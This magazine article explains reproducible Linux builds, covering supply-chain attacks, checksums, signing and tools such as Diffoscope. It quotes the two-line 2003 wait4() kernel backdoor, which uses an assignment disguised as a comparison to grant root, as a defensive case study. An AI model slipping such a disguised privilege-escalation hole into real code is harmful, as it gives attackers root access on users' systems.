Linux Format

Reproducible builds

Jonni Bidwell’s not paranoid. He just doesn’t trust any code unless he can compile it himself and produce identical output!


Open source code means anyone can read it. But to trust it you need to be sure of the build process too, advises Jonni Bidwell.

Your local tinfoil hat vendor will happily regale you with tales of the new and terrifying ways miscreants and intelligence services can implant unwanted and undetectable software on our machines. Sadly, rootkits and poisoned firmware aren’t just campfire stories – once a system is compromised they can be all but impossible to detect.

Traditional Linux package management offers some degree of security, and open source code, by its very nature, is readable by anyone curious enough. Yet this isn’t enough, and 2015’s XcodeGhost malware, which targeted the Xcode development platform on Apple developers’ machines, illustrated exactly why. By distributing poisoned versions of Xcode, attackers were able to make developers unwittingly upload backdoored apps to the Apple app store. While the attack was in part enabled by Apple’s walled garden approach, something similar, namely targeting the weak point in the compilation chain, could well have happened for open source software.

Source-based distributions, such as Gentoo, are great, but it’s more convenient to have binary packages available. And if one wants to know whether a binary was generated from a given source, one faces a number of problems. The binary files that compilers spit out are influenced by the processor type, the versions of the compiler and libraries being used, source paths and even the time of compilation; all of these will engender different results. If we can recreate the packager’s build environment, and all that pesky non-deterministic data can somehow be stripped out, then we should be able to reproduce that same binary file. Then we can be sure nothing dodgy has happened between the source code hitting the repo and the binary being downloaded to our machine. We know the packager hasn’t (knowingly or otherwise) injected anything untoward.
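
To make that concrete, here’s a minimal Python sketch of one common source of non-determinism: timestamps. Packing the same sources with their real modification times bakes “when it was built” into the output, so the archive’s hash changes from checkout to checkout; pinning every timestamp (and ownership) to a fixed value – the idea behind the reproducible builds project’s SOURCE_DATE_EPOCH convention – makes the output identical everywhere. The file names are hypothetical.

import hashlib
import io
import tarfile

def pack(paths, fixed_mtime=None):
    # Pack files into an uncompressed tar in memory and hash the result.
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path in sorted(paths):            # stable input order
            info = tar.gettarinfo(path)       # mtime, uid etc come from the filesystem
            if fixed_mtime is not None:
                info.mtime = fixed_mtime      # factor out "when it was built"
                info.uid = info.gid = 0       # ...and "who built it"
                info.uname = info.gname = "root"
            with open(path, "rb") as fh:
                tar.addfile(info, fh)
    return hashlib.sha256(buf.getvalue()).hexdigest()

files = ["main.c", "Makefile"]                # hypothetical source files
print(pack(files))                            # varies between checkouts and machines
print(pack(files, fixed_mtime=0))             # identical wherever the sources are identical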

Back in 2003 a strange thing happened. Actually, lots of strange things, but let’s focus on one. Linus Torvalds had yet to invent Git, and the Linux kernel was still using Larry McVoy’s proprietary BitKeeper version control system. Not everyone liked BitKeeper (a point that would later become moot when some reverse-engineering saw the kernel project politely asked to find another platform), so many developers used a CVS clone of the BitKeeper repository, with BitKeeper acting as the master repository and the CVS repo being synchronised from it regularly.

Larry noticed that someone had inserted some changes directly into the CVS repo, and done so without including the usual commit message and audit data. The change appeared very minor: just two lines were inserted in the wait4() function and, at least on a cursory reading, they appeared quite innocuous:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

It looks as though, if certain options are set and the current user is root, an error code is returned (EINVAL represents an invalid argument). But all is not what it seems – the devil is in the equals sign. Were this the equality operator == things would be fine, but as the code stands, when called with the aforesaid invalid options it cunningly sets the current user ID to root (a single = stands for assignment). It’s a tiny backdoor, and had it not been for the lack of accompanying approval records and the vigilance of Larry and his team, it could well have gone unnoticed. The change appeared to come from a respected developer’s account, after all. Exactly who was behind the attack may never be known. Some have speculated state involvement, others a disgruntled former developer. Speculate, we dare not.

X marks the hack

An even more stealthy attack happened in 2015, this time involving iOS developers using Apple’s Xcode IDE. Traffic entering China from Apple’s servers suffers at the hands of the Great Firewall, so many developers chose to download Xcode from outside the Apple store, specifically from a download service called Baidu Pan. Unfortunately, this version of Xcode had a bonus extra in the form of a trojan.

Unlike most malware, this didn’t try to interfere directly with the developers’ machines on which it was being run. Instead, it weaselled code into the applications that those developers built with Xcode, which they then uploaded to the Apple App Store. Such was the stealthiness of the injected code that it made it past Apple’s stringent code-vetting process, and those compromised apps were promulgated through the Chinese App Store.

XcodeGhost, as the vulnerability became known, backdoored victims’ iDevices, harvesting logins and passwords and generally doing no good. Again, we see attackers using developers as a pivot point for their attacks, rather than aiming directly for the main infrastructure, which in the case of Apple would be a hard target. Documents released by Snowden reveal that the CIA had been working on just such an Xcode hack two years prior, although there’s no evidence to suggest they were responsible for XcodeGhost.

We could go on: the kernel.org website was hacked in 2011 (and the perpetrator arrested five years later), and C veteran Ken Thompson pointed out in 1984 that if one can sneak code into a compiler, then backdoors can be nigh-invisibly inserted into any code that compiler emits. In particular, even if the sneaky code is detected and removed from the compiler’s source, using that same compiler to compile itself perpetuates the backdoor ( http://bit.ly/ken-t).

Double the ‘fun’

These tales all serve to illustrate a couple of points. First, one has to really know one’s onions if one hopes to catch bugs and malfeasance just by perusing source code. And second, that even with open source code, the compilation process represents an attack vector that can be exploited in a number of hard-to-detect ways.

Historically, Linux users have, more or less rightfully, looked on with disdain as Windows users happily download and run binaries from all kinds of dodgy corners of the Internet. This happens less with Linux, partly because we have glorious package management, but mainly because guaranteeing a program will run on all Linux distributions would require statically linking in every library it depends on, resulting in massive files for all but the most humble of projects.

Ironically, new “universal packaging” technologies like FlatPak, AppImage, Snaps and Docker essentially lower this moral high ground. But we digress: modern package management provides two very helpful security measures, checksums and signatures. Once we’ve downloaded a file, we can hash it (feed it to an algorithm which returns a short value, 32 bytes in the case of the popular SHA-256 algorithm) and compare that value with what the author of that file says it should be (essentially checking a sum).
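
As a rough sketch of what that verification amounts to, here’s how you might check a download by hand with Python’s hashlib. The file name and the published digest below are placeholders, not real values.

import hashlib

def sha256_of(path, chunk_size=1 << 20):
    # Hash the file in 1MB chunks so even a multi-gigabyte ISO fits in memory.
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        while chunk := fh.read(chunk_size):
            digest.update(chunk)
    return digest.hexdigest()

published = "aa0f2ddc0123..."                 # placeholder: copy this from the project's SHA256SUMS
actual = sha256_of("distro-installer.iso")    # placeholder file name
print("checksum OK" if actual == published else "MISMATCH - do not trust this file!")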

Distributions typically maintain a trusted package signing key, or a list of trusted packagers’ signing keys, which are shipped to end users by the appropriate package management mechanism. When a maintainer compiles their package they sign its contents, so that the signature can be verified when users install that package. This is a complex business, but it’s all handled seamlessly by the package manager (or at least it should be – see our interview with PackageCloud’s Joe Damato in LXF226 for some examples where it was neglected).

A matter of trust

When, for example, on Ubuntu we add a PPA to install something outside the repos, the add-apt-repository script generally adds that PPA’s signing key to the Apt keyring. Ubuntu maintains its own keyserver ( http://keyserver.ubuntu.com) and there are other public keyservers against which such keys can be verified, since it’d be silly to trust an arbitrary key from someone you don’t know. The Secure Apt page on the Debian wiki ( https://wiki.debian.org/SecureApt) contains more details about how package signing works there.
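
Roughly speaking, Secure Apt boils down to checking a detached OpenPGP signature on the repository’s metadata (the Release file) with keys you already trust. Here’s a hedged Python sketch of that step done by hand – apt itself uses gpgv and its own keyrings, and the file names here are illustrative.

import subprocess

# Verify the detached signature Release.gpg over the Release file,
# using whatever keys are in the local GnuPG keyring.
result = subprocess.run(
    ["gpg", "--verify", "Release.gpg", "Release"],
    capture_output=True, text=True,
)
print("signature good" if result.returncode == 0 else "verification FAILED")
print(result.stderr)    # gpg reports the signing key and date on stderr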

Unfortunately, neither checksum nor signature verification will protect us from an attack in the build chain. By verifying a publicised checksum for a binary file, all we can be sure of is that if the file has been tampered with, then the tamperer also had access to wherever that checksum was published. So when Linux Mint’s website was hacked to point to a poisoned ISO file, it was trivial for the attacker to display an updated checksum too (the fact that Mint was using insecure SHA-1 hashes is irrelevant here).

By verifying a public key signature, all we can be sure of is that someone we trust (by virtue of us trusting the distribution) says that file is what it purports to be. If a developer’s machine was compromised, then they would not be aware of the horrors they were signing. And this is why we need reproducibility. The Tor Project was one of the earliest to adopt build reproducibility; this 2013 blog post ( http://bit.ly/tor-blog) goes into much more detail than we can here about why people worry about this. In addition, this Chaos Computer Club talk ( http://bit.ly/r-builds) explains some of the leaks that reproducible builds hope to plug, and also contains more examples of real-world attacks against Linux-related infrastructure.

Today, there are many different players contributing to the reproducible builds effort, including major distributions such as Arch Linux, Debian, FreeBSD, Fedora and openSUSE. It’s sponsored by the Linux Foundation’s Core Infrastructure Initiative ( www.coreinfrastructure.org), which aims to secure the open source code that runs the Internet. Much more information is available at www.reproducible-builds.org.

Reproduction sexy time

There are many free tools to aid the reproducible build movement. One of the most important is Diffoscope, which can swiftly detect and point out differences between two files, be they binaries, archives, text files… anything. Readers will no doubt be familiar with the diff utility, used among other things to generate neat-looking patches for source code.

Diffoscope, then, is like this on steroids, giving human-readable output for all kinds of file formats. There’s even an online demo you can try ( https://try.diffoscope.org), since Diffoscope depends on many helper utilities to perform its magic and you may not want to add 336 packages and lose 2GB of space (tested on a clean install of Ubuntu 17.10 beta).
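
If you’d rather run it locally, a typical use is comparing a package you rebuilt yourself against the one shipped in the repositories. A small sketch (the .deb file names are made up) that leans on the fact that Diffoscope typically exits with a non-zero status when it finds differences:

import subprocess

ours = "hello_2.10-2_amd64.deb"          # the package we rebuilt locally (hypothetical)
theirs = "hello_2.10-2_amd64.repo.deb"   # the same package fetched from the mirror (hypothetical)
result = subprocess.run(["diffoscope", ours, theirs])
if result.returncode == 0:
    print("bit-for-bit identical - reproducible!")
else:
    print("differences found - see Diffoscope's report above")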

Making software reproducible, once you impose some reasonable conditions on the build environment (such as consistent versions and fixed paths), doesn’t always require any major changes to current build processes. It’s much more concerned with massaging out the kinks where non-determinism can creep in.

Problems will arise when inputs to the compiler arrive in unstable order. For example, if a Makefile demands that src/*.c be compiled, the wildcard may be expanded differently between environments (some locales are case insensitive, whereas others will list uppercase filenames first). Similar problems may also arise as a result of the underlying filesystem, which dictates the order in which directories are read. The disorderfs tool helps developers test for this kind of anomaly by providing a FUSE filesystem that randomises the order in which entries are read.
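
The fix for unstable input order is usually boringly simple: sort the inputs with a rule that doesn’t depend on the locale or the filesystem. A tiny Python illustration of the problem and the cure:

import glob

sources = glob.glob("src/*.c")    # order comes from the filesystem: arbitrary
sources.sort()                    # byte-wise comparison, independent of locale
print(sources)                    # now the same list on every build machine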

Safe reproduction

Makefiles and the like can then be adapted (for example, by passing wildcard expansions to sort with the locale set to C) to cope with this non-determinism. A recent patch to GCC enables one to specify the build directory prefix, essentially factoring that variable out of the resulting binaries and meaning that devs can build wherever they please. For now some things are best dealt with after the fact, and the strip-nondeterminism tool can normalise lots of file types after they’ve been compiled. It is hoped that in the long term it won’t be needed.
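
One long-standing GCC option in this vein is -fdebug-prefix-map=OLD=NEW, which rewrites the build directory recorded in debug information, so two developers building in different directories can still get identical output. A hedged sketch of using it from Python, with hello.c standing in for a real project:

import os
import subprocess

build_dir = os.getcwd()           # differs from developer to developer
subprocess.run(
    ["gcc", "-g", "-fdebug-prefix-map=%s=." % build_dir, "-o", "hello", "hello.c"],
    check=True,                   # raise if the compile fails
)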

On Debian, the mainstay of testing reproducible builds (sometimes called idempotent builds) is srebuild, a wrapper around sbuild, the standard tool for building packages inside minimal chroots. This makes it possible for users to recreate a build environment, fetch and compile a source package, and then compare the resultant binaries with those in the repositories. For Debian source packages, a buildinfo file, generated by dpkg-buildpackage, is used to describe the build environment of a source package. The mission to make all Debian packages reproducible began in 2013. By January 2015 around 80 per cent of source packages (for the Unstable branch, whence originate Ubuntu’s, and by extension so many other distributions’, packages) could be built reproducibly. Today, for the stable Stretch release, that ratio is around 94 per cent. Unfortunately, most of the remaining packages (around 1,300 in number) will require special attention and treatment.

Of course, silver bullets are rare and our adversaries determined, so when reproducibility is ubiquitous we still won’t be short of things to worry about. Last year, Red Hat’s Josh Bressers penned a blog post entitled “Trusting, Trusting Trust” (the title is a parody of Ken Thompson’s original paper, Reflections on Trusting Trust). In it he points out that such reproducibility doesn’t guarantee that the compiler used was clean, or that we can trust the binaries it emitted. All it tells us is that the binary being verified hasn’t been tampered with.

Josh points out that real-world software production no longer takes place in isolation. Projects depend on libraries and build systems outside of their control. With that in mind, there remain plenty of places outside of the compilation process where trust could be subverted. Still, it’s an amazing effort, and just because we can never guarantee security doesn’t mean we shouldn’t try to improve it.

If you’re feeling adventurous, information about how to achieve reproducible builds of Debian packages for yourself is available at http://bit.ly/debian-builds.

“Makefiles and the like can be adapted to cope with this non-determinism”

The FOSS app store FDroid wants to be reproducible, too. Verification servers build unsigned APKs and check their signatures.

The Core Infrastructure Initiative will save us from bad guys, off-by-one errors and dark wizards (sure, blame the wizards – Ed).

Run rabbit, run! Coreboot run a weekly Jenkins job to test their images for reproducibility (at the time of writing there are 329 of them). So far so good.

Diffoscope’s website gives you an account of the differences between files that’s human readable, or where that’s not possible, colourful.

A hard core of packages still needs beating into reproducibility. Go on, get involved!
